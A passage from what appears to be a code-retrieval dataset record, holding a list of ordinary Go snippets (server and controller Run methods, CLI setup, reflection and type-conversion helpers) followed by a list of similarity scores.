err\n\t}\n\n\t<-ctx.Done()\n\treturn ctx.Err()\n}", "func (c *TestClient) Run() {\n\tc.MetricsServer = metrics.StartMetricsServer(fmt.Sprintf(\":%d\", c.HostConfig.MetricsPort))\n\tmetrics.RegisterMetrics(metrics.PodIPAddressAssignedLatency, metrics.PodCreationReachabilityLatency)\n\tdefer utils.ShutDownMetricsServer(context.TODO(), c.MetricsServer)\n\n\tif err := c.measurePodCreation(); err != nil {\n\t\tklog.Errorf(\"Pod creation test failed, error: %v\", err)\n\t}\n\t// Prevent application from terminating and pod from restarting.\n\t// The test will run only once when the application is deployed.\n\t// The pod needs to be recreated to rerun the test.\n\tutils.EnterIdleState(c.MainStopChan)\n}", "func (app *Application) Run() error {\n\n\tr := gin.Default()\n\tr.LoadHTMLGlob(\"templates/*\")\n\n\t// inject Config into context\n\n\tr.Use(func(c *gin.Context) {\n\t\tc.Set(\"cfg\", app.Config)\n\t\tc.Next()\n\t})\n\n\t// CSRF\n\tr.Use(wraphh.WrapHH(nosurf.NewPure))\n\n\tr.Static(app.Options.StaticURL, app.Options.StaticDir)\n\n\tr.GET(\"/\", indexPage)\n\n\tapi := r.Group(\"/api\")\n\n\tapi.GET(\"/all/\", getMovies)\n\tapi.GET(\"/\", getRandomMovie)\n\tapi.POST(\"/\", addMovie)\n\tapi.GET(\"/suggest\", suggest)\n\tapi.GET(\"/movie/:id\", getMovie)\n\tapi.DELETE(\"/movie/:id\", deleteMovie)\n\tapi.PATCH(\"/seen/:id\", markSeen)\n\n\tr.Run()\n\treturn nil\n}", "func (o *Orchestrator) Run() {\n\tv := newValidator(o.Plugin)\n\tm := newMetrics(o.healthzPath, o.healthzPort, o.metricsPath, o.metricsPort)\n\n\tv.mustValidatePrerequisites()\n\n\to.mustServeKMSRequests()\n\n\t// Giving some time for kmsPlugin to start Serving.\n\t// TODO: Must be a better way than to sleep.\n\ttime.Sleep(3 * time.Millisecond)\n\n\tv.mustPingRPC()\n\tmustGatherMetrics()\n\n\tm.mustServeHealthzAndMetrics()\n\n\t// Giving some time for HealthZ and Metrics to start Serving.\n\t// TODO: Must be a better way than to sleep.\n\ttime.Sleep(3 * time.Millisecond)\n\tmustEmitOKHealthz()\n\tmustEmitMetrics()\n}", "func (w Watcher) Run(stopCh <-chan struct{}) {\n\tfmt.Println(\"client/run:Running\")\n\tgo w.controller.Run(stopCh)\n}", "func main() {\n\tnumChannels := flag.Uint64(\"channels\", 0, \"Number of channels for batch processing\")\n\tversionFlag := flag.Bool(\"version\", false, \"Print version information and exit\")\n\tflag.Parse()\n\n\t/*\n\t * Print version information or start the actual application.\n\t */\n\tif *versionFlag {\n\t\tmsg, err := controller.Version()\n\n\t\t/*\n\t\t * If an error occured, print error message, otherwise\n\t\t * print version information.\n\t\t */\n\t\tif err != nil {\n\t\t\tmsg = err.Error()\n\t\t}\n\n\t\tfmt.Printf(\"%s\\n\", msg)\n\t} else {\n\t\tnumChannels32 := uint32(*numChannels)\n\t\tcn := controller.CreateController()\n\t\tcn.Operate(numChannels32)\n\t}\n\n}", "func Run() error {\n\tcfg := config.Load()\n\n\tapp := &cli.App{\n\t\tName: \"prometheus-hcloud-sd\",\n\t\tVersion: version.String,\n\t\tUsage: \"Prometheus HetznerCloud SD\",\n\t\tAuthors: []*cli.Author{\n\t\t\t{\n\t\t\t\tName: \"Thomas Boerger\",\n\t\t\t\tEmail: \"[email protected]\",\n\t\t\t},\n\t\t},\n\t\tFlags: RootFlags(cfg),\n\t\tCommands: []*cli.Command{\n\t\t\tHealth(cfg),\n\t\t\tServer(cfg),\n\t\t},\n\t}\n\n\tcli.HelpFlag = &cli.BoolFlag{\n\t\tName: \"help\",\n\t\tAliases: []string{\"h\"},\n\t\tUsage: \"Show the help, so what you see now\",\n\t}\n\n\tcli.VersionFlag = &cli.BoolFlag{\n\t\tName: \"version\",\n\t\tAliases: []string{\"v\"},\n\t\tUsage: \"Print the current version of that tool\",\n\t}\n\n\treturn app.Run(os.Args)\n}", "func (s *HelloWordModule) Run(mainParams *application.MainParams) error {\n\n\t// make the local context for this module instance\n\tvar localCtx context.Context\n\tlocalCtx, s.cancel = context.WithCancel(mainParams.Ctx)\n\n\t// run module workers\n\tmainParams.Wg.Add(1) // every time increment the WaitGroup before start goroutine\n\tgo printHello(localCtx, mainParams.Wg, cfg.Name) // run goroutine\n\n\treturn nil\n}", "func TestExample(t *testing.T) {\n\tinstance := &RestExample{\n\t\tpost: make(map[string]string),\n\t\twatch: make(map[string]chan string),\n\t}\n\n\tinstance.HandleCreateHello(HelloArg{\n\t\tTo: \"rest\",\n\t\tPost: \"rest is powerful\",\n\t})\n\n\tresp, err := rest.SetTest(instance, map[string]string{\"to\": \"rest\"}, nil)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\targ := instance.HandleHello()\n\tif resp.Code != http.StatusOK {\n\t\tt.Error(\"should return ok\")\n\t}\n\tif arg.To != \"rest\" {\n\t\tt.Error(\"arg.To should be rest\")\n\t}\n\tif arg.Post != \"rest is powerful\" {\n\t\tt.Error(\"arg.Post should be 'rest is powerful'\")\n\t}\n\n\tresp, err = rest.SetTest(instance, map[string]string{\"to\": \"123\"}, nil)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\targ = instance.HandleHello()\n\tif resp.Code != http.StatusNotFound {\n\t\tt.Error(\"should return not found\")\n\t}\n}", "func add(mgr manager.Manager, r reconcile.Reconciler) error {\n\t// Create a new controller\n\tc, err := controller.New(\"example-controller\", mgr, controller.Options{Reconciler: r})\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Watch for changes to primary resource Example\n\terr = c.Watch(&source.Kind{Type: &examplev1alpha1.Example{}}, &handler.EnqueueRequestForObject{})\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Watch for changes to secondary resource Pods and requeue the owner Example\n\terr = c.Watch(&source.Kind{Type: &corev1.Pod{}}, &handler.EnqueueRequestForOwner{\n\t\tIsController: true,\n\t\tOwnerType: &examplev1alpha1.Example{},\n\t})\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (c *Controller) Run() error {\n\tc.k8sFactory.Start(c.stopCh)\n\tc.k8sFactory.WaitForCacheSync(c.Stop)\n\n\tfor {\n\t\tselect {\n\t\tcase event := <-c.eventAddedCh:\n\t\t\tc.evaluateEvent(event)\n\t\tcase eventUpdate := <-c.eventUpdatedCh:\n\t\t\tc.evaluateEventUpdate(eventUpdate)\n\t\tcase <-c.Stop:\n\t\t\tglog.Info(\"Stopping\")\n\t\t\treturn nil\n\t\t}\n\t}\n}", "func (c *Controller) Run(ctx context.Context) {\n\tgo c.watchServiceCenterUpdate(ctx)\n}", "func (c *Client) Run(ctx context.Context, req *Request, resp interface{}) error {\n\tselect {\n\tcase <-ctx.Done():\n\t\treturn ctx.Err()\n\tdefault:\n\t}\n\n\treturn c.runWithJSON(ctx, req, resp)\n}", "func main() {\n\tws := new(restful.WebService)\n\tws.Route(ws.GET(\"/run\").To(hello))\n\trestful.Add(ws)\n\tlog.Fatal(http.ListenAndServe(\":8080\", nil))\n}", "func (c *Controller) Run(ctx context.Context) {\n\tvar (\n\t\tl = log.WithFields(logrus.Fields{\n\t\t\t\"component\": \"Controller.Run\",\n\t\t})\n\t)\n\tl.Info(\"Starting LocalNodeStore Observer\")\n\n\t// setup a reconciliation trigger on LocalNodeStore changes\n\tc.LocalNodeStore.Observe(ctx, func(node node.LocalNode) { c.Sig.Event(struct{}{}) }, func(err error) {\n\t\tl.WithError(err).Info(\"LocalNodeStore observe has yielded. Reconciliation will no longer be triggered for LocalNode changes\")\n\t})\n\n\t// add an initial signal to kick things off\n\tc.Sig.Event(struct{}{})\n\n\tl.Info(\"Cilium BGP Control Plane Controller now running...\")\n\tfor {\n\t\tselect {\n\t\tcase <-ctx.Done():\n\t\t\tl.Info(\"Cilium BGP Control Plane Controller shut down\")\n\t\t\treturn\n\t\tcase <-c.Sig.Sig:\n\t\t\tl.Info(\"Cilium BGP Control Plane Controller woken for reconciliation\")\n\t\t\tif err := c.Reconcile(ctx); err != nil {\n\t\t\t\tl.WithError(err).Error(\"Encountered error during reconciliation\")\n\t\t\t} else {\n\t\t\t\tl.Debug(\"Successfully completed reconciliation\")\n\t\t\t}\n\t\t}\n\t}\n}", "func (a *api) Run() {\n\tport := strconv.FormatInt(int64(a.Config.HttpPort), 10)\n\ta.logger.Info(\"Running API on \", port)\n\tgraceful.Run(\":\"+port, 100*time.Millisecond, a.ge)\n}", "func runHandler(w http.ResponseWriter, r *http.Request) {\n\t//Parse input form and get the content of the go file\n\tform := url.Values{}\n\terr := r.ParseForm()\n\tcheckHttpError(err, w)\n\t\n\t//Check if file exists\n\tfilename := filepath.Join(SamplePath, r.Form[\"file\"][0])\n\tif _, err := os.Stat(filename); os.IsNotExist(err) {\n\t\thttp.Error(w, \"Go snippet file not found\", http.StatusNotFound)\n\t\treturn\n\t}\n\t\n\tfilego, err := ioutil.ReadFile(filename)\n\tcheckHttpError(err, w)\n\tform.Add(\"version\", \"2\")\n\tform.Add(\"body\", string(filego))\n\trequestPlayground(form, HostPlayGround + \"/compile\", w)\n}", "func (s *Server) Run() {\n\trouter := gin.Default()\n\n\tv1 := router.Group(\"/v1\")\n\t{\n\t\tv1.POST(\"/login\", s.authMiddleware.LoginHandler)\n\t\tv1.POST(\"/users\", s.createUser)\n\n\t\tv1.Use(s.authMiddleware.MiddlewareFunc())\n\t\t{\n\n\t\t\tv1.GET(\"/tasks\", s.allTasks)\n\t\t\tv1.GET(\"/tasks/:id\", s.getTask)\n\t\t\tv1.POST(\"/tasks\", s.createTask)\n\t\t\tv1.PUT(\"/tasks/:id\", s.updateTask)\n\t\t}\n\t}\n\n\trouter.Run(\":\" + s.config.Port)\n}", "func (app *Application) Run() {\n\t// register middlewares\n\tapp.Middlewares()\n\n\t// register resources\n\tapp.Resources()\n\n\t// run server\n\tapp.Application.Run()\n}" ]
[ "0.67348576", "0.66505885", "0.66439044", "0.6609574", "0.6539736", "0.64293873", "0.6291595", "0.62279844", "0.622355", "0.6150853", "0.613807", "0.6056417", "0.6001624", "0.59732664", "0.5962315", "0.596212", "0.59548074", "0.5906366", "0.5878088", "0.5838066", "0.5800944", "0.5792022", "0.577855", "0.5777612", "0.57571447", "0.57334447", "0.57037723", "0.57024604", "0.5694225", "0.56805724", "0.5680361", "0.5679926", "0.5672804", "0.56641287", "0.56552416", "0.56533086", "0.56527793", "0.565147", "0.56457424", "0.56382495", "0.56220436", "0.5613089", "0.56085473", "0.56080276", "0.56014645", "0.5599545", "0.5599334", "0.5590471", "0.5573981", "0.5572226", "0.55655116", "0.55318063", "0.5530178", "0.55184644", "0.5518449", "0.5514087", "0.5513363", "0.5502948", "0.55009156", "0.55002666", "0.5495731", "0.5490591", "0.5489757", "0.5488214", "0.547999", "0.5475603", "0.54754305", "0.5474525", "0.5471789", "0.5468643", "0.54680705", "0.5464363", "0.5455917", "0.5455565", "0.5452477", "0.54490805", "0.5448774", "0.5445371", "0.54432994", "0.5440607", "0.5437422", "0.5434725", "0.5428885", "0.5423162", "0.54230595", "0.5418676", "0.5412979", "0.540168", "0.540024", "0.5399204", "0.5397717", "0.53956324", "0.53949654", "0.5389746", "0.5388831", "0.53867507", "0.53847075", "0.5381189", "0.53810376", "0.5368833" ]
0.6582908
4
Function that will be assigned to a type The receiver is a pointer to the Animal type
func (a *Animal) Says() { fmt.Printf("A %s says %s", a.Name, a.Sound) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func Ptrto(t *Type) *Type", "func (u *unifier) at(x *TypeParam) Type {\n\treturn *u.handles[x]\n}", "func ptr[T any](value T) *T {\n\treturn &value\n}", "func TestType(t *testing.T) {\n\tanimal1 := NewAnimal(Dog)\n\tanimal1.Say()\n\tanimal2 := NewAnimal(Cat)\n\tanimal2.Say()\n}", "func (t *Type) Val() *Type", "func ptr[T any](x T) *T {\n\treturn &x\n}", "func (t *Type) ForwardType() *ForwardType", "func (t *Type) Copy() *Type", "func ( /* receiver */ ) bmi() /* return type */ {\n}", "func MakeAssignment(sun, fun interface{}, mode ...pointerMode) {\n\tvar (\n\t\tfunT = reflect.TypeOf(fun)\n\t\tins []reflect.Type\n\t)\n\n\t// sun's first argument needs to be an interface containing or\n\t// a pointer to fun's output type\n\tswitch funT.Out(0).Kind() {\n\tcase reflect.Interface:\n\t\tins = append(ins, funT.Out(0))\n\tcase reflect.Ptr:\n\t\tif isMaybe(mode) {\n\t\t\tins = append(ins, funT.Out(0))\n\t\t} else {\n\t\t\tins = append(ins, reflect.PtrTo(funT.Out(0)))\n\t\t}\n\tdefault:\n\t\tins = append(ins, reflect.PtrTo(funT.Out(0)))\n\t}\n\n\t// followed by the rest of fun's arguments\n\tfor i := 0; i < funT.NumIn(); i++ {\n\t\tins = append(ins, funT.In(i))\n\t}\n\n\t// sun's type signature\n\tbunT := reflect.FuncOf(ins, nil, funT.IsVariadic())\n\n\t// sun's implementation\n\tbun := reflect.MakeFunc(\n\t\tbunT,\n\t\tfunc(args []reflect.Value) (outs []reflect.Value) {\n\t\t\tvar res []reflect.Value\n\t\t\t// unpack slice of variadic argument\n\t\t\tif funT.IsVariadic() {\n\t\t\t\tvar (\n\t\t\t\t\t// all but the first and the last argument\n\t\t\t\t\tinVs = args[1 : len(args)-1]\n\t\t\t\t\t// last argument\n\t\t\t\t\tvariadic = args[len(args)-1]\n\t\t\t\t)\n\t\t\t\t// append elements from variadic argument\n\t\t\t\tfor i := 0; i < variadic.Len(); i++ {\n\t\t\t\t\tinVs = append(inVs, variadic.Index(i))\n\t\t\t\t}\n\t\t\t\tres = reflect.ValueOf(fun).Call(inVs)\n\t\t\t} else {\n\t\t\t\t// pass all but the first argument\n\t\t\t\tres = reflect.ValueOf(fun).Call(args[1:])\n\t\t\t}\n\t\t\tswitch funT.Out(0).Kind() {\n\t\t\tcase reflect.Interface:\n\t\t\t\t// set interface{} content\n\t\t\t\targs[0].Elem().Elem().Set(res[0].Elem())\n\t\t\tcase reflect.Ptr:\n\t\t\t\tif isMaybe(mode) {\n\t\t\t\t\tif !res[0].IsNil() {\n\t\t\t\t\t\t// set content behind pointer\n\t\t\t\t\t\targs[0].Elem().Set(res[0].Elem())\n\t\t\t\t\t}\n\t\t\t\t} else {\n\t\t\t\t\t// set pointer content\n\t\t\t\t\targs[0].Elem().Set(res[0])\n\t\t\t\t}\n\t\t\tdefault:\n\t\t\t\t// set pointer content\n\t\t\t\targs[0].Elem().Set(res[0])\n\t\t\t}\n\t\t\treturn\n\t\t})\n\n\t// assign the assignment function to sun\n\treflect.ValueOf(sun).Elem().Set(bun)\n}", "func (self *Graphics) SetTypeA(member int) {\n self.Object.Set(\"type\", member)\n}", "func main() {\n\tsh := Shape{20, \"Hinh CN\"}\n\tfmt.Println(sh)\n\n\t// 1. Value Receiver\n\tsh.changeNameByVal()\n\tfmt.Println(sh)\n\n\t// 2. Pointer Receiver\n\tsh.changeNameByPointer()\n\tfmt.Println(sh)\n\n\t// 3. non-struct\n\tms := MyString(\"my string\")\n\tfmt.Println(ms)\n\tms.changeMyStringByVal()\n\tfmt.Println(ms)\n\tms.changeMyStringByPointer()\n\tfmt.Println(ms)\n}", "func (u *unifier) set(x *TypeParam, t Type) {\n\tassert(t != nil)\n\tif traceInference {\n\t\tu.tracef(\"%s ➞ %s\", x, t)\n\t}\n\t*u.handles[x] = t\n}", "func resolvePointer(i interface{}) interface{} {\n\t// Try to get object/receiver name from interface.\n\tk := reflect.ValueOf(i).Type().Kind()\n\n\t// If interface type is not a pointer, take it.\n\tif k != reflect.Ptr {\n\t\tptr := reflect.New(reflect.TypeOf(i))\n\t\ttemp := ptr.Elem()\n\t\ttemp.Set(reflect.ValueOf(i))\n\t\ti = ptr.Interface()\n\t}\n\n\treturn i\n}", "func createAnimal(animalType string) (Animal, error) {\n\tvar animal Animal\n\n\tswitch animalType {\n\tcase \"cow\":\n\t\tanimal = Cow{\"grass\", \"walk\", \"moo\"}\n\tcase \"bird\":\n\t\tanimal = Bird{\"worms\", \"fly\", \"chirp\"}\n\tcase \"snake\":\n\t\tanimal = Snake{\"mice\", \"slither\", \"hsss\"}\n\tdefault:\n\t\treturn nil, errors.New(\"Unavailable animal type\")\n\t}\n\n\treturn animal, nil\n}", "func (self *Rectangle) SetTypeA(member int) {\n self.Object.Set(\"type\", member)\n}", "func (t *Type) Elem() *Type", "func (t TypeRegister) Set(i interface{}) {\n\tif reflect.ValueOf(i).Kind() != reflect.Ptr {\n\t\tpanic(errors.New(\"TypeRegister.Set() argument must to be a pointer\"))\n\t}\n\tt[reflect.TypeOf(i).String()] = reflect.TypeOf(i)\n}", "func (t TypeRegister) Set(i interface{}) {\n\tif reflect.ValueOf(i).Kind() != reflect.Ptr {\n\t\tpanic(errors.New(\"gpks.TypeRegister.Set() argument must to be a pointer\"))\n\t}\n\tt[reflect.TypeOf(i).String()] = reflect.TypeOf(i)\n}", "func (*NamedTypeDummy) isType() {}", "func (self *TileSprite) SetTypeA(member int) {\n self.Object.Set(\"type\", member)\n}", "func (m IPType) Pointer() *IPType {\n\treturn &m\n}", "func (d *decoder) pointer(name string, value reflect.Value, def string) error {\n\tif !d.getGlobalProvider().Get(name).HasValue() {\n\t\treturn nil\n\t}\n\n\tif value.IsNil() {\n\t\tvalue.Set(reflect.New(value.Type().Elem()))\n\t}\n\n\treturn d.unmarshal(name, value.Elem(), def)\n}", "func (l langType) ChangeType(register string, regTyp interface{}, v interface{}, errorInfo string) string {\n\t//fmt.Printf(\"DEBUG CHANGE TYPE: %v -- %v\\n\", regTyp, v)\n\tswitch v.(ssa.Value).(type) {\n\tcase *ssa.Function:\n\t\trx := v.(*ssa.Function).Signature.Recv()\n\t\tpf := \"\"\n\t\tif rx != nil { // it is not the name of a normal function, but that of a method, so append the method description\n\t\t\tpf = rx.Type().String() // NOTE no underlying()\n\t\t} else {\n\t\t\tif v.(*ssa.Function).Pkg != nil {\n\t\t\t\tpf = v.(*ssa.Function).Pkg.Object.Name()\n\t\t\t}\n\t\t}\n\t\treturn register + \"=\" +\n\t\t\t\"new Closure(Go_\" + l.LangName(pf, v.(*ssa.Function).Name()) + \".call,[]);\"\n\tdefault:\n\t\tswitch v.(ssa.Value).Type().Underlying().(type) {\n\t\tcase *types.Basic:\n\t\t\tif v.(ssa.Value).Type().Underlying().(*types.Basic).Kind() == types.UnsafePointer {\n\t\t\t\t/* from https://groups.google.com/forum/#!topic/golang-dev/6eDTDZPWvoM\n\t\t\t\t \tTreat unsafe.Pointer -> *T conversions by returning new(T).\n\t\t\t\t \tThis is incorrect but at least preserves type-safety...\n\t\t\t\t\tTODO decide how UnsafePointer should fail!\n\t\t\t\t*/\n\t\t\t\treturn register + \"=new UnsafePointer(\" + l.LangType(regTyp.(types.Type), true, errorInfo) + \");\"\n\t\t\t}\n\t\t}\n\t}\n\treturn register + `=` + l.IndirectValue(v, errorInfo) + \";\" // usually, this is a no-op as far as Haxe is concerned\n\n}", "func NewAnimal(words []string) {\n\n\tname := strings.ToLower(words[0])\n\n\tswitch strings.ToLower(words[1]) {\n\tcase \"cow\":\n\t\tcows[name] = MakeCow(name)\n\t\ttypes[name] = \"cow\"\n\tcase \"bird\":\n\t\tbirds[name] = MakeBird(name)\n\t\ttypes[name] = \"bird\"\n\tcase \"snake\":\n\t\tsnakes[name] = MakeSnake(name)\n\t\ttypes[name] = \"snake\"\n\tdefault:\n\t\tfmt.Printf(\"Unknown Animal Type <%s> Cannot Create it\\n\", words[1])\n\t\treturn\n\t}\n\tfmt.Println(\"Created it!\")\n}", "func (v *Value) AdaptToType(target ValueType) {\n\tif v.ValueType == VARCHAR && target != VARCHAR {\n\t\ttmp, err := String2Value(v.ToStr(), ValueTypeDefaultSize[target], target)\n\t\tif err != nil {\n\t\t\tv.ValueType = NO_ATTR\n\t\t\treturn\n\t\t}\n\t\t*v = tmp\n\t\treturn\n\t}\n\tswitch target {\n\tcase INT:\n\t\tif v.ValueType == FLOAT {\n\t\t\tv.FromInt64(int(v.ToFloat64()))\n\t\t\treturn\n\t\t}\n\t\tif v.ValueType == INT {\n\t\t\treturn\n\t\t}\n\tcase FLOAT:\n\t\tif v.ValueType == FLOAT {\n\t\t\treturn\n\t\t}\n\t\tif v.ValueType == INT {\n\t\t\tv.FromFloat64(float64(v.ToInt64()))\n\t\t\treturn\n\t\t}\n\tcase DATE:\n\t\tif v.ValueType == INT || v.ValueType == DATE {\n\t\t\tv.ValueType = DATE\n\t\t\treturn\n\t\t}\n\tcase VARCHAR:\n\t\tif v.ValueType == VARCHAR {\n\t\t\treturn\n\t\t}\n\tcase BOOL:\n\t\tif v.ValueType == BOOL {\n\t\t\treturn\n\t\t}\n\t}\n\tv.ValueType = NO_ATTR\n}", "func main() {\n\n\t/*\n\t\tvar a Animal\n\t\tfmt.Println(a)\n\t*/\n\n\tanimals := []Animal{\n\t\tDog{\"white\"},\n\t\tCat{2},\n\t}\n\n\tfor _, a := range animals {\n\t\tfmt.Println(a.Speak())\n\t\tfmt.Printf(\"Type of animal? %T\\n\", a)\n\n\t\t// converti a en chien (afin qu'on puisse faire des verifications)\n\t\t// t, ok := a.(Dog)\n\t\t// fmt.Printf(\"Type assertion value=%v, ok=%v\\n\", t, ok)\n\n\t\tif t, ok := a.(Dog); ok {\n\t\t\tfmt.Printf(\"We have a dog! color=%v\\n\", t.color)\n\t\t} else {\n\t\t\tfmt.Println(\"It's not a dog here...\")\n\t\t}\n\t}\n\n\tfmt.Println(\"--------------------\")\n\n\tfor _, a := range animals {\n\t\tdescribeAnimal(a)\n\t}\n}", "func (*UserType) getDec() {}", "func createTypeCast(prog *Program, in value.Value, to types.Type) (value.Value, error) {\n\n\tinType := in.Type()\n\tfromInt := types.IsInt(inType)\n\tfromFloat := types.IsFloat(inType)\n\n\ttoInt := types.IsInt(to)\n\ttoFloat := types.IsFloat(to)\n\n\tinSize := typeSize(inType)\n\toutSize := typeSize(to)\n\n\t// If the cast would not change the type, just return the in value, nil\n\tif types.Equal(inType, to) {\n\t\treturn in, nil\n\t}\n\n\tif c, ok := in.(*constant.Int); ok && types.IsInt(to) {\n\t\tc.Typ = to.(*types.IntType)\n\t\treturn c, nil\n\t}\n\n\tif c, ok := in.(*constant.Float); ok && types.IsFloat(to) {\n\t\tc.Typ = to.(*types.FloatType)\n\t\treturn c, nil\n\t}\n\n\tif types.Equal(to, types.Void) {\n\t\treturn nil, nil\n\t}\n\n\tif types.IsPointer(inType) && types.IsPointer(to) {\n\t\treturn prog.Compiler.CurrentBlock().NewBitCast(in, to), nil\n\t}\n\n\tif fromFloat && toInt {\n\t\treturn prog.Compiler.CurrentBlock().NewFPToSI(in, to), nil\n\t}\n\n\tif fromInt && toFloat {\n\t\treturn prog.Compiler.CurrentBlock().NewSIToFP(in, to), nil\n\t}\n\n\tif fromInt && toInt {\n\t\tif inSize < outSize {\n\t\t\treturn prog.Compiler.CurrentBlock().NewSExt(in, to), nil\n\t\t}\n\t\tif inSize == outSize {\n\t\t\treturn in, nil\n\t\t}\n\t\treturn prog.Compiler.CurrentBlock().NewTrunc(in, to), nil\n\t}\n\n\tif fromFloat && toFloat {\n\t\tif inSize < outSize {\n\t\t\treturn prog.Compiler.CurrentBlock().NewFPExt(in, to), nil\n\t\t}\n\t\tif inSize == outSize {\n\t\t\treturn in, nil\n\t\t}\n\t\treturn prog.Compiler.CurrentBlock().NewFPTrunc(in, to), nil\n\t}\n\n\t// If the cast would not change the type, just return the in value, nil\n\tif types.Equal(inType, to) {\n\t\treturn in, nil\n\t}\n\n\tif types.IsPointer(inType) && types.IsInt(to) {\n\t\treturn prog.Compiler.CurrentBlock().NewPtrToInt(in, to), nil\n\t}\n\n\tif types.IsInt(inType) && types.IsPointer(to) {\n\t\treturn prog.Compiler.CurrentBlock().NewIntToPtr(in, to), nil\n\t}\n\n\treturn nil, fmt.Errorf(\"Failed to typecast type %s to %s\", inType.String(), to)\n}", "func newTypeEncoder(t reflect.Type, allowAddr bool) encoderFunc {\n\tif t.Implements(marshalerType) {\n\t\treturn marshalerEncoder\n\t}\n\n\tif t.Implements(binaryMarshalerType) {\n\t\treturn binaryMarshalerEncoder\n\t}\n\n\tif t.Implements(gobEncoderType) {\n\t\treturn gobEncoder\n\t}\n\n\tif t.Kind() != reflect.Ptr && allowAddr {\n\t\tft := reflect.PtrTo(t)\n\t\tif ft.Implements(marshalerType) {\n\t\t\treturn addrEncoder(marshalerEncoder, newTypeEncoder(t, false))\n\t\t}\n\t\tif ft.Implements(binaryMarshalerType) {\n\t\t\treturn addrEncoder(binaryMarshalerEncoder, newTypeEncoder(t, false))\n\t\t}\n\t\tif ft.Implements(gobEncoderType) {\n\t\t\treturn addrEncoder(gobEncoder, newTypeEncoder(t, false))\n\t\t}\n\t}\n\n\tswitch t.Kind() {\n\tcase reflect.Bool:\n\t\treturn boolEncoder\n\tcase reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64:\n\t\treturn intEncoder\n\tcase reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr:\n\t\treturn uintEncoder\n\tcase reflect.Float32:\n\t\treturn float32Encoder\n\tcase reflect.Float64:\n\t\treturn float64Encoder\n\tcase reflect.Complex64:\n\t\treturn complex64Encoder\n\tcase reflect.Complex128:\n\t\treturn complex128Encoder\n\tcase reflect.String:\n\t\treturn stringEncoder\n\tcase reflect.Map:\n\t\tif !isNative(t.Key().Kind(), true) { // eventually will support pointer keys and structs, but not gonna happen until it's needed\n\t\t\treturn invalidEncoder\n\t\t}\n\t\treturn newMapEncoder(t)\n\tcase reflect.Slice, reflect.Array:\n\t\treturn newSliceEncoder(t.Elem())\n\tcase reflect.Struct:\n\t\treturn newStructEncoder(t)\n\tcase reflect.Ptr:\n\t\treturn ptrEncoder(newTypeEncoder(t.Elem(), false))\n\tcase reflect.Interface:\n\t\treturn ifaceEncoder\n\t}\n\treturn invalidEncoder\n}", "func Bar(h Human) {\n\tswitch h.(type) {\n\tcase Person:\n\t\tfmt.Print(\"i am a Person \")\n\t\tfmt.Println(\"I was passed into barrrrrr\", h.(Person).First)\n\t\tfmt.Println(\"I was passed into barrrrrr\", h.(Person).First)\n\tcase SecretAgent:\n\t\tfmt.Print(\"i am a Secret Agent \")\n\t\tfmt.Println(\"I was passed into barrrrrr\", h.(SecretAgent).First)\n\t}\n\t//fmt.Println(\"I was passed into bar\", h)\n}", "func newTypeEncoder(t reflect.Type, allowAddr bool) encoderFunc {\n\t// Not sure if the following code is necessary\n\t/*\n\t\tif t.Implements(marshalerType) {\n\t\t\treturn marshalerEncoder\n\t\t}\n\t\tif t.Kind() != reflect.Ptr && allowAddr {\n\t\t\tif reflect.PtrTo(t).Implements(marshalerType) {\n\t\t\t\treturn newCondAddrEncoder(addrMarshalerEncoder, newTypeEncoder(t, false))\n\t\t\t}\n\t\t}\n\n\t\tif t.Implements(textMarshalerType) {\n\t\t\treturn textMarshalerEncoder\n\t\t}\n\t\tif t.Kind() != reflect.Ptr && allowAddr {\n\t\t\tif reflect.PtrTo(t).Implements(textMarshalerType) {\n\t\t\t\treturn newCondAddrEncoder(addrTextMarshalerEncoder, newTypeEncoder(t, false))\n\t\t\t}\n\t\t}\n\t*/\n\n\tswitch t.Kind() {\n\tcase reflect.Bool:\n\t\treturn boolEncoder\n\tcase reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64:\n\t\treturn intEncoder\n\tcase reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr:\n\t\treturn uintEncoder\n\tcase reflect.String:\n\t\treturn stringEncoder\n\tcase reflect.Interface:\n\t\t// return interfaceEncoder\n\t\treturn interfaceEncoder\n\tcase reflect.Struct:\n\t\t// return newStructEncoder(t)\n\t\treturn structEncoder\n\tcase reflect.Map:\n\t\t// return newMapEncoder(t)\n\t\treturn mapEncoder\n\tcase reflect.Slice:\n\t\t// return newSliceEncoder(t)\n\t\treturn sliceEncoder\n\tcase reflect.Array:\n\t\t// return newArrayEncoder(t)\n\t\treturn arrayEncoder\n\tcase reflect.Ptr:\n\t\t// return newPtrEncoder(t)\n\t\treturn ptrEncoder\n\tdefault:\n\t\treturn unsupportedTypeEncoder\n\t}\n}", "func (c *Column) OfType(dbType string, sampleValue interface{}) *Column {\n\tc.dbType = dbType\n\tc.scanType = reflect.TypeOf(sampleValue)\n\treturn c\n}", "func (keyType *KeyType) Accept(value interface{}) error {\n\tvar tmp KeyType\n\tswitch x := value.(type) {\n\tcase string:\n\t\ttmp = KeyType(x)\n\tcase KeyType:\n\t\ttmp = x\n\tdefault:\n\t\treturn fmt.Errorf(\"invalid type for jwa.KeyType: %T\", value)\n\t}\n\t_, ok := keyTypeAlg[tmp.String()]\n\tif !ok {\n\t\treturn errors.New(\"unknown Key Type algorithm\")\n\t}\n\n\t*keyType = tmp\n\treturn nil\n}", "func (p Path) Type(reference, value interface{}) Path { return p.with(Type, reference, value) }", "func (t *Type) FuncType() *FuncType", "func (pointerToPerson *person) updateName(newFirstName string) { //*person is different from *pointerToPerson\n\t//*[type] this is a type description that means we are working with a pointer to a person\n\t//*[pointerToPerson] this is an operator that gives us access to the value we wnt to manipulate or access\n\t(*pointerToPerson).firstName = newFirstName //* operator asks for the value that is stored at that memory address\n}", "func as(in interface{}, as interface{}) interface{} {\n\toutType := reflect.TypeOf(as)\n\n\tif outType.Kind() != reflect.Ptr {\n\t\tpanic(\"outType is not a pointer \" + outType.String())\n\t}\n\n\tif reflect.TypeOf(in).Kind() != reflect.Func {\n\t\tctype := reflect.FuncOf(nil, 